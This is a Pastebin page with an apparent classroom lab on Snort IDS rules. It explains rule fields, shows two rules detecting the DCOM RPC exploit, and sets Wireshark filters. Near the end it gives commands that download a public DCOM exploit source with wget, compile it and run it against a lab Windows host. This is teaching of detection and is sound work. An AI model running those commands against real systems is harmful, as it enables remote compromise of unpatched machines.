API tools faq
paste
Advertisement
joemccray

Quick Snort Rule Demo

joemccray
Mar 12th, 2019
460
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.00 KB | None | 0 0
raw download clone embed print report
  1. #############################
  2. # Understanding Snort rules #
  3. #############################
  4. Field 1: Action - Snort can process events in 1 of 3 ways (alert, log, drop)
  5.  
  6. Field 2: Protocol - Snort understands a few types of traffic (tcp, udp, icmp)
  7.  
  8. Field 3: Source IP (can be a variable like $External_Net, or an IP, or a range)
  9.  
  10. Field 4: Source Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
  11.  
  12. Field 5: Traffic Direction (->)
  13.  
  14. Field 6: Destination IP (can be a variable like $External_Net, or an IP, or a range)
  15.  
  16. Field 7: Destination Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
  17.  
  18. Field 8: MSG - what is actually displayed on the analysts machine
  19.  
  20.  
  21. Let's look at 2 simple rules
  22. ----------------------------------------------------------------------------------
  23. alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:”NETBIOS DCERPC ISystemActivator \
  24. bind attempt”; flow:to_server,established; content:”|05|”; distance:0; within:1; \
  25. content:”|0b|”; distance:1; within:1; byte_test:1,&,1,0,relative; content:”|A0 01 00 \
  26. 00 00 00 00 00 C0 00 00 00 00 00 00 46|”; distance:29; within:16; \
  27. reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2192; rev:1;)
  28.  
  29. alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:”NETBIOS SMB DCERPC ISystemActivator bind \
  30. attempt”; flow:to_server,established; content:”|FF|SMB|25|”; nocase; offset:4; \
  31. depth:5; content:”|26 00|”; distance:56; within:2; content:”|5c \
  32. 00|P|00|I|00|P|00|E|00 5c 00|”; nocase; distance:5; within:12; content:”|05|”; \
  33. distance:0; within:1; content:”|0b|”; distance:1; within:1; \
  34. byte_test:1,&,1,0,relative; content:”|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 \
  35. 46|”; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; \
  36. sid:2193; rev:1;)
  37. ----------------------------------------------------------------------------------
  38.  
  39.  
  40.  
  41. From your Linux machine ping your Windows machine
  42. ---------------------------Type This-----------------------------------
  43. ping 192.168.150.1
  44. -----------------------------------------------------------------------
  45.  
  46.  
  47. Start wireshark and let's create some simple filters:
  48.  
  49. Filter 1:
  50. ip.addr==192.168.150.1
  51. -----------------------------------------------------------------------
  52.  
  53. Filter 2:
  54. ip.addr==192.168.150.1 && icmp
  55. -----------------------------------------------------------------------
  56.  
  57.  
  58. Filter 3:
  59. ip.addr==192.168.150.1 && !(tcp.port==22)
  60. -----------------------------------------------------------------------
  61. Now stop your capture and restart it (make sure you keep the filter)
  62.  
  63.  
  64.  
  65.  
  66. Back to your Linux machine:
  67. [ CTRL-C ] - to stop your ping
  68.  
  69. wget http://downloads.securityfocus.com/vulnerabilities/exploits/oc192-dcom.c
  70.  
  71.  
  72. gcc -o exploit oc192-dcom.c
  73.  
  74. ./exploit
  75.  
  76.  
  77. ./exploit -d 192.168.150.1 -t 0
  78. -----------------------------------------------------------------------
  79.  
  80.  
  81.  
  82. Now go back to WireShark and stop the capture.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!